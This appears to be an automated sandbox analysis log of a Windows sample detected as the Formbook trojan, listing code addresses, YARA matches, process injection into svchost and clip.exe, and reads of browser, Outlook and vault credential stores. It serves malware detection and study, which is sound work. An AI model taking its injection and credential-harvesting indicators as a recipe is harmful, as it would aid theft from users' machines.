            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A96BD79_2_04A96BD7
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A9AB409_2_04A9AB40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A9F43F9_2_04A9F43F
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049D14609_2_049D1460
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A7D5B09_2_04A7D5B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A975719_2_04A97571
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A916CC9_2_04A916CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A9F7B09_2_04A9F7B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A970E99_2_04A970E9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A9F0E09_2_04A9F0E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049E70C09_2_049E70C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A8F0CC9_2_04A8F0CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049EB1B09_2_049EB1B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04AAB16B9_2_04AAB16B
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A1516C9_2_04A1516C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049CF1729_2_049CF172
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049E52A09_2_049E52A0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A812ED9_2_04A812ED
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049FB2C09_2_049FB2C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A2739A9_2_04A2739A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A9132D9_2_04A9132D
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049CD34C9_2_049CD34C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A9FCF29_2_04A9FCF2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A59C329_2_04A59C32
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049FFDC09_2_049FFDC0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A97D739_2_04A97D73
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049E3D409_2_049E3D40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A91D5A9_2_04A91D5A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049E9EB09_2_049E9EB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049E1F929_2_049E1F92
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A9FFB19_2_04A9FFB1
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A9FF099_2_04A9FF09
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049E38E09_2_049E38E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A4D8009_2_04A4D800
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A759109_2_04A75910
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049E99509_2_049E9950
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049FB9509_2_049FB950
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A25AA09_2_04A25AA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A7DAAC9_2_04A7DAAC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A81AA39_2_04A81AA3
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A8DAC69_2_04A8DAC6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A53A6C9_2_04A53A6C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A9FA499_2_04A9FA49
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A97A469_2_04A97A46
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049FFB809_2_049FFB80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A55BF09_2_04A55BF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A1DBF99_2_04A1DBF9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A9FB769_2_04A9FB76
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_02A217209_2_02A21720
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_02A3A2809_2_02A3A280
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_02A1ABB09_2_02A1ABB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_02A1CB309_2_02A1CB30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_02A1C9089_2_02A1C908
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_02A1C9109_2_02A1C910
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_02A232709_2_02A23270
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_047DA43A9_2_047DA43A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_047DC0FC9_2_047DC0FC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_047DB1689_2_047DB168
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_047DBC449_2_047DBC44
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_047DBD649_2_047DBD64
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: String function: 00E38B40 appears 42 times
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: String function: 00E17F41 appears 35 times
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: String function: 00E30D27 appears 70 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0342B970 appears 277 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03475130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03487E54 appears 111 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04A5F290 appears 105 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04A27E54 appears 102 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 049CB970 appears 277 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04A4EA12 appears 86 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04A15130 appears 58 times
            Source: TOgpmvvWoj.exe, 00000004.00000003.1294226378.0000000003923000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TOgpmvvWoj.exe
            Source: TOgpmvvWoj.exe, 00000004.00000003.1294992955.0000000003ACD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TOgpmvvWoj.exe
            Source: TOgpmvvWoj.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.1485611383.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.1484985282.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3762941792.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3758152425.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3763129724.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.1486102715.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3763045399.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@14/11
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E7A2D5 GetLastError,FormatMessageW,4_2_00E7A2D5
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E68713 AdjustTokenPrivileges,CloseHandle,4_2_00E68713
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E68CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,4_2_00E68CC3
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E7B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,4_2_00E7B59E
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E8F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,4_2_00E8F121
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E886D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,4_2_00E886D0
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E14FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,4_2_00E14FE9
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeFile created: C:\Users\user~1\AppData\Local\Temp\aut8D99.tmpJump to behavior
            Source: TOgpmvvWoj.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: clip.exe, 00000009.00000003.1670877674.0000000002AFF000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000009.00000002.3758257175.0000000002AF5000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000009.00000002.3758257175.0000000002B23000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000009.00000003.1668150510.0000000002AF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: TOgpmvvWoj.exeReversingLabs: Detection: 60%
            Source: unknownProcess created: C:\Users\user\Desktop\TOgpmvvWoj.exe "C:\Users\user\Desktop\TOgpmvvWoj.exe"
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TOgpmvvWoj.exe"
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TOgpmvvWoj.exe"Jump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: TOgpmvvWoj.exeStatic file information: File size 1180160 > 1048576
            Source: TOgpmvvWoj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: TOgpmvvWoj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: TOgpmvvWoj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: TOgpmvvWoj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: TOgpmvvWoj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: TOgpmvvWoj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: TOgpmvvWoj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000000.1411571684.000000000030E000.00000002.00000001.01000000.00000005.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000000.1556057454.000000000030E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: TOgpmvvWoj.exe, 00000004.00000003.1301147279.00000000039A0000.00000004.00001000.00020000.00000000.sdmp, TOgpmvvWoj.exe, 00000004.00000003.1298508688.0000000003800000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1485647293.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1485647293.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1396440551.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1398141581.0000000003200000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000009.00000002.3763569921.00000000049A0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000009.00000002.3763569921.0000000004B3E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000009.00000003.1484930871.0000000004630000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000009.00000003.1488364602.00000000047EB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: TOgpmvvWoj.exe, 00000004.00000003.1301147279.00000000039A0000.00000004.00001000.00020000.00000000.sdmp, TOgpmvvWoj.exe, 00000004.00000003.1298508688.0000000003800000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000006.00000002.1485647293.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1485647293.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1396440551.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1398141581.0000000003200000.00000004.00000020.00020000.00000000.sdmp, clip.exe, clip.exe, 00000009.00000002.3763569921.00000000049A0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000009.00000002.3763569921.0000000004B3E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000009.00000003.1484930871.0000000004630000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000009.00000003.1488364602.00000000047EB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000006.00000003.1453476434.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1485400848.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000002.3762132057.0000000001268000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: clip.exe, 00000009.00000002.3758257175.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000009.00000002.3768118603.0000000004FCC000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000002E2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1774720636.0000000039A3C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: clip.exe, 00000009.00000002.3758257175.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000009.00000002.3768118603.0000000004FCC000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000002E2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1774720636.0000000039A3C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000006.00000003.1453476434.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1485400848.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 00000008.00000002.3762132057.0000000001268000.00000004.00000020.00020000.00000000.sdmp
            Source: TOgpmvvWoj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: TOgpmvvWoj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: TOgpmvvWoj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: TOgpmvvWoj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: TOgpmvvWoj.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E8C304 LoadLibraryA,GetProcAddress,4_2_00E8C304
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E38B85 push ecx; ret 4_2_00E38B98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004031C0 push eax; ret 6_2_004031C2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004161D3 push ecx; ret 6_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004162CC push ecx; ret 6_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00417356 push ebx; retf 6_2_00417359
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00416338 push ecx; ret 6_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004083DA push es; ret 6_2_004083DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0040BBEC pushad ; iretd 6_2_0040BBEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00418577 push 2823B84Bh; retf 6_2_00418587
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00417D38 push ecx; iretd 6_2_00417D39
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00401E6C push dword ptr [ebx+3E93C2B8h]; retf 6_2_00401EDE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00411E39 push esp; ret 6_2_00411E41
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00401ECE push dword ptr [ebx+3E93C2B8h]; retf 6_2_00401EDE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0340225F pushad ; ret 6_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034027FA pushad ; ret 6_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034309AD push ecx; mov dword ptr [esp], ecx6_2_034309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0340283D push eax; iretd 6_2_03402858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0340135E push eax; iretd 6_2_03401369
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeCode function: 8_2_032A7395 push ebx; retf 8_2_032A7398
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeCode function: 8_2_032AEA1C push edx; ret 8_2_032AEA38
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeCode function: 8_2_032ADF64 push FFFFFFB8h; retf 8_2_032ADF66
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeCode function: 8_2_032A1E78 push esp; ret 8_2_032A1E80
